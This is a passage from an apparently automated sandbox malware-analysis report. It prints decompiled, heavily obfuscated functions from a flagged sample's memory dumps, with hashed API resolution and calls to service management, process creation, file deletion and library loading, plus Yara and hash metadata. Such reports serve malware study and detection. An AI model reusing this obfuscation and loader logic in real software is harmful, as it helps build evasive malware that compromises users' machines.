                                          				_v36 = 0x87ea;
                                          				_v36 = _v36 | 0x75974cd4;
                                          				_v36 = _v36 ^ 0x75979443;
                                          				_v32 = 0x7f4c;
                                          				_v32 = _v32 ^ 0x8971dc13;
                                          				_v32 = _v32 ^ 0x89718547;
                                          				_v24 = 0xd36b;
                                          				_t104 = 0x3c;
                                          				_v24 = _v24 * 9;
                                          				_v24 = _v24 << 1;
                                          				_v24 = _v24 >> 5;
                                          				_v24 = _v24 ^ 0x000045e9;
                                          				_v20 = 0xf34d;
                                          				_v20 = _v20 + 0x5309;
                                          				_v20 = _v20 << 0xa;
                                          				_v20 = _v20 | 0x23e3e3ea;
                                          				_v20 = _v20 ^ 0x27fbee67;
                                          				_v16 = 0xef72;
                                          				_v16 = _v16 * 0x55;
                                          				_v16 = _v16 << 0x10;
                                          				_v16 = _v16 / _t104;
                                          				_v16 = _v16 ^ 0x0225d37d;
                                          				_push(_v28);
                                          				_t91 = E006C1000(_v40, _v12, _v36, _v32, E006D889D(_t93, _v8, _v16));
                                          				_t95 =  *0x6dca28; // 0x233138
                                          				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
                                          				return E006D2025(_v24, _t90, _v20, _v16);
                                          			}




















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: 81#$#
                                          • API String ID: 1029625771-2479327819
                                          • Opcode ID: c303e2fe2ec90e50e393ef42cead17641110c0b737193de08bcbf8f5169719c4
                                          • Instruction ID: 63575d75ffc2314fc1d60a4b7b2a2d448a7bc20dd79127decb5445e60851fc2f
                                          • Opcode Fuzzy Hash: c303e2fe2ec90e50e393ef42cead17641110c0b737193de08bcbf8f5169719c4
                                          • Instruction Fuzzy Hash: 1941EE72C0121AEBDF04CFA6C94A4EEFBB1FB54318F208599C411B62A0D7B90B48CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E006C568E(void* __ecx, void* __edx) {
                                          				void* _t188;
                                          				void* _t209;
                                          				void* _t210;
                                          				signed int _t215;
                                          				signed int _t216;
                                          				signed int _t217;
                                          				signed int _t218;
                                          				signed int _t219;
                                          				intOrPtr _t242;
                                          				void* _t245;
                                          				void* _t248;
                                          				void* _t249;
                                          
                                          				_t248 = _t249 - 0x5c;
                                          				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
                                          				_t245 = __edx;
                                          				_push(0);
                                          				_push( *((intOrPtr*)(_t248 + 0x78)));
                                          				_push( *((intOrPtr*)(_t248 + 0x74)));
                                          				_push( *((intOrPtr*)(_t248 + 0x70)));
                                          				_push(_t242);
                                          				_push( *((intOrPtr*)(_t248 + 0x68)));
                                          				_push( *((intOrPtr*)(_t248 + 0x64)));
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t188);
                                          				 *(_t248 + 0x38) = 0xda0c;
                                          				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
                                          				_t215 = 0x75;
                                          				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
                                          				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
                                          				 *(_t248 + 0x54) = 0xb39d;
                                          				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
                                          				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
                                          				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
                                          				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
                                          				 *(_t248 + 0x1c) = 0x5da7;
                                          				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
                                          				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
                                          				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
                                          				 *(_t248 + 0x30) = 0xba31;
                                          				_t216 = 0x2c;
                                          				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
                                          				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
                                          				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
                                          				 *(_t248 + 0x2c) = 0x6402;
                                          				_t217 = 0x3f;
                                          				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
                                          				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
                                          				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
                                          				 *(_t248 + 0x34) = 0x3e45;
                                          				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
                                          				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
                                          				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
                                          				 *(_t248 + 0x3c) = 0xfd38;
                                          				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
                                          				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
                                          				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
                                          				 *(_t248 + 0x40) = 0xcc4c;
                                          				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
                                          				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
                                          				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
                                          				 *(_t248 + 0x28) = 0x6724;
                                          				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
                                          				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
                                          				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
                                          				 *(_t248 + 0x24) = 0x9d87;
                                          				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
                                          				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
                                          				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
                                          				 *(_t248 + 0x58) = 0xb89d;
                                          				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
                                          				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
                                          				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
                                          				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
                                          				 *(_t248 + 0x44) = 0x534f;
                                          				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
                                          				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
                                          				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
                                          				 *(_t248 + 0x20) = 0x7c36;
                                          				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
                                          				_t218 = 0x73;
                                          				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
                                          				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
                                          				 *(_t248 + 0x4c) = 0x6d80;
                                          				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
                                          				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
                                          				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
                                          				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
                                          				 *(_t248 + 0x50) = 0x11c0;
                                          				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
                                          				_t219 = 0x49;
                                          				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
                                          				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
                                          				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
                                          				 *(_t248 + 0x18) = 0x8ddc;
                                          				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
                                          				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
                                          				 *(_t248 + 0x14) = 0xfbdb;
                                          				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
                                          				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
                                          				 *(_t248 + 0x48) = 0xd404;
                                          				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
                                          				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
                                          				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
                                          				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
                                          				_t220 =  *(_t248 + 0x38);
                                          				E006D93A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
                                          				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
                                          				_t209 = E006D976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
                                          				if(_t209 == 0) {
                                          					_t210 = 0;
                                          				} else {
                                          					if(_t242 == 0) {
                                          						E006D4F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
                                          						E006D4F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
                                          					} else {
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          					}
                                          					_t210 = 1;
                                          				}
                                          				return _t210;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: @p
                                          • API String ID: 963392458-2609516012
                                          • Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                          • Instruction ID: a0d37cf29bc1304b8910d44a1257786f46177b01af6a5621889f0e79d6b586fc
                                          • Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                          • Instruction Fuzzy Hash: 9E912572500288EFDF58CF61C94A9DE3BA2FF44348F508119FE16962A0D3B6D959CF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E006CC0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				char _v592;
                                          				void* _t141;
                                          				void* _t159;
                                          				signed int _t161;
                                          				signed int _t162;
                                          				signed int _t163;
                                          				signed int _t164;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t141);
                                          				_v64 = _v64 & 0x00000000;
                                          				_v60 = _v60 & 0x00000000;
                                          				_v72 = 0x2e7eef;
                                          				_v68 = 0x12a0e3;
                                          				_v36 = 0x822d;
                                          				_v36 = _v36 ^ 0x7542ca13;
                                          				_v36 = _v36 >> 8;
                                          				_v36 = _v36 ^ 0x00755fa2;
                                          				_v48 = 0xc0ea;
                                          				_t161 = 0x4d;
                                          				_v48 = _v48 * 0x52;
                                          				_v48 = _v48 + 0x53ba;
                                          				_v48 = _v48 ^ 0x003e0539;
                                          				_v8 = 0xf2be;
                                          				_v8 = _v8 ^ 0xca92c6dd;
                                          				_v8 = _v8 | 0xdeb53509;
                                          				_v8 = _v8 + 0x330e;
                                          				_v8 = _v8 ^ 0xdeb75724;
                                          				_v28 = 0xbc60;
                                          				_v28 = _v28 * 3;
                                          				_v28 = _v28 ^ 0x088be546;
                                          				_v28 = _v28 ^ 0x0889fb38;
                                          				_v20 = 0x79be;
                                          				_v20 = _v20 / _t161;
                                          				_t162 = 0x2f;
                                          				_v20 = _v20 * 0x21;
                                          				_v20 = _v20 / _t162;
                                          				_v20 = _v20 ^ 0x000058f8;
                                          				_v12 = 0x6f12;
                                          				_v12 = _v12 + 0x2ef8;
                                          				_v12 = _v12 ^ 0xc4c69b2c;
                                          				_t163 = 0x19;
                                          				_v12 = _v12 / _t163;
                                          				_v12 = _v12 ^ 0x07dec8f1;
                                          				_v16 = 0x233d;
                                          				_v16 = _v16 >> 0xd;
                                          				_v16 = _v16 ^ 0xb86ca57e;
                                          				_v16 = _v16 ^ 0x25a63868;
                                          				_v16 = _v16 ^ 0x9dca839c;
                                          				_v44 = 0x9c92;
                                          				_v44 = _v44 ^ 0x484225af;
                                          				_v44 = _v44 << 0xa;
                                          				_v44 = _v44 ^ 0x0ae4f7f7;
                                          				_v56 = 0xf3a1;
                                          				_v56 = _v56 + 0xffff3be5;
                                          				_v56 = _v56 ^ 0x00000dea;
                                          				_v24 = 0xe687;
                                          				_v24 = _v24 ^ 0x2fa59812;
                                          				_v24 = _v24 | 0x8a70baf8;
                                          				_v24 = _v24 << 0xe;
                                          				_v24 = _v24 ^ 0x7fbf04b5;
                                          				_v40 = 0x7d0b;
                                          				_v40 = _v40 + 0xffffa14c;
                                          				_v40 = _v40 + 0x5747;
                                          				_v40 = _v40 ^ 0x000069af;
                                          				_v32 = 0xbccf;
                                          				_v32 = _v32 << 0xb;
                                          				_v32 = _v32 + 0xa312;
                                          				_v32 = _v32 ^ 0x05e7304f;
                                          				_v52 = 0xd186;
                                          				_v52 = _v52 << 7;
                                          				_t164 = 0xc;
                                          				_v52 = _v52 / _t164;
                                          				_v52 = _v52 ^ 0x0008a17f;
                                          				_push(_v48);
                                          				E006D7BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E006D889D(0x6dc050, _v36, _v52));
                                          				E006D2025(_v16, _t154, _v44, _v56);
                                          				_t159 = E006DAA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
                                          				return _t159;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID: ~.
                                          • API String ID: 4033686569-2304494891
                                          • Opcode ID: 826762e58cd5e338586cf1ae24690b8851e4ed5ae47d36de2eaeecf5572fdf83
                                          • Instruction ID: 5568205177b44777e55481c921507bfbbdd6f4844e769742736e774d105b4ba2
                                          • Opcode Fuzzy Hash: 826762e58cd5e338586cf1ae24690b8851e4ed5ae47d36de2eaeecf5572fdf83
                                          • Instruction Fuzzy Hash: 365112B1C0121DEBDF48DFE5D94A8EEBBB2FB08304F208159E511B6260D7B91A54DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006C8736(long __ecx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				void* _t64;
                                          				signed int _t66;
                                          				signed int _t67;
                                          				signed int _t68;
                                          				long _t77;
                                          
                                          				_v16 = 0x5e27;
                                          				_v16 = _v16 >> 0x10;
                                          				_v16 = _v16 + 0xcb06;
                                          				_v16 = _v16 + 0xffffffa0;
                                          				_v16 = _v16 ^ 0x0000caae;
                                          				_v20 = 0x53d5;
                                          				_v20 = _v20 << 0xf;
                                          				_v20 = _v20 ^ 0x29eaafbc;
                                          				_v12 = 0x2701;
                                          				_t77 = __ecx;
                                          				_t66 = 0x3f;
                                          				_v12 = _v12 * 0x75;
                                          				_v12 = _v12 / _t66;
                                          				_v12 = _v12 >> 9;
                                          				_v12 = _v12 ^ 0x0000510c;
                                          				_v24 = 0xb555;
                                          				_v24 = _v24 | 0xad821aca;
                                          				_v24 = _v24 ^ 0xad82f196;
                                          				_v8 = 0x411b;
                                          				_t67 = 0x67;
                                          				_v8 = _v8 / _t67;
                                          				_t68 = 0x1c;
                                          				_v8 = _v8 / _t68;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 ^ 0x00005eaa;
                                          				_t64 = E006D981E(_t77, E006CC506(_t68), _v16, _v12, _v24, _v8); // executed
                                          				return _t64;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                          • Instruction ID: e40efc28fc74b0942bb0964a788276a1189a712dacfe257a565ff7c0daa456b6
                                          • Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                          • Instruction Fuzzy Hash: 6E215671D00209EFEF08DFA5D94A4DEBBB2EB44304F208199D415B7294E7B51B64DF85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E006C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E006C602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E006D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006C29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 0d90814f6e3e98dddc946965e93f2e1c0a25011b10019f6726629396f8a684e9
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 6A016D72A00108BFEB14DF95DC0A9DFBFB6EF44310F108089F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E006CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E006C602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E006D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006CC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 7e0c757dfb255f1e9486b82fffa48cea1d3adc185dba1f33bdcace53b76a2b62
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 391133B290122DBBCB25DF94DD498EFBFB9EF04714F108188F90966210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E006C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E006C602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E006D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 006C1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 595082948c127377ca9c24a2aaf2efaa831d8029a0979ed7cd247bea10029107
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: C2015BB6D01309BBEF44DF94C94AADEBBB1EB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006C4859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E006D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 006C48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f977ee72c49a2ce788bd0dd8ccf2a57d70dd6a84fe47d661be0c35e563bf7402
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 66F01D70D05209FBDB44CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E10001780(intOrPtr* _a4, long _a8) {
                                          				long _t31;
                                          				signed int _t32;
                                          				intOrPtr* _t37;
                                          				void* _t47;
                                          				void** _t48;
                                          				signed int _t52;
                                          				signed int _t55;
                                          				long _t56;
                                          
                                          				_t48 = _a8;
                                          				_t56 = _t48[2];
                                          				if(_t56 != 0) {
                                          					_t52 = _t48[3];
                                          					if((_t52 & 0x02000000) == 0) {
                                          						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
                                          						if((_t52 & 0x04000000) != 0) {
                                          							_t31 = _t31 | 0x00000200;
                                          						}
                                          						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
                                          						asm("sbb eax, eax");
                                          						return  ~( ~_t32);
                                          					} else {
                                          						_t47 =  *_t48;
                                          						if(_t47 == _t48[1]) {
                                          							if(_t48[4] != 0) {
                                          								L7:
                                          								VirtualFree(_t47, _t56, 0x4000); // executed
                                          							} else {
                                          								_t37 = _a4;
                                          								_t55 =  *(_t37 + 0x30);
                                          								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
                                          									goto L7;
                                          								}
                                          							}
                                          						}
                                          						return 1;
                                          					}
                                          				} else {
                                          					return _t56 + 1;
                                          				}
                                          			}












                                          APIs
                                          • VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                          • Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
                                          • Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                          • Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E006D4F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006C602B(_t17);
